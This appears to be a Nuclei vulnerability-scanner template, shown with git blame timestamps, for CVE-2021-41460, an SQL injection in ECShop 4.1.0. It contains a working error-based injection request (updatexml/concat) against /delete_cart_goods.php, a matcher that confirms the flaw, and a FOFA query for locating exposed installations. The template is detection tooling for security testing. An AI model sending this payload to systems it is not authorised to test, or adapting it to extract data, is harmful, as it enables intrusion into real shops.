nuclei-templates/http/cves/2021/CVE-2021-41460.yaml

51 lines
1.3 KiB
YAML
Raw Normal View History

2023-08-22 05:08:38 +00:00
id: CVE-2021-41460
info:
name: ECShop 4.1.0 - SQL Injection
author: SleepingBag945
severity: high
description: |
ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460).
2023-08-22 05:08:38 +00:00
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823
- https://nvd.nist.gov/vuln/detail/CVE-2021-41460
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2023-08-22 05:08:38 +00:00
cve-id: CVE-2021-41460
2023-08-31 11:46:18 +00:00
cwe-id: CWE-89
epss-score: 0.01115
epss-percentile: 0.82751
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:*
2023-08-22 05:08:38 +00:00
metadata:
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: shopex
product: ecshop
2023-09-06 12:09:01 +00:00
fofa-query: product="ECShop"
2023-08-22 05:08:38 +00:00
tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli
variables:
num: "999999999"
http:
- raw:
- |
POST /delete_cart_goods.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))
2023-08-22 06:43:25 +00:00
matchers-condition: and
2023-08-22 05:08:38 +00:00
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'
- type: status
status:
- 200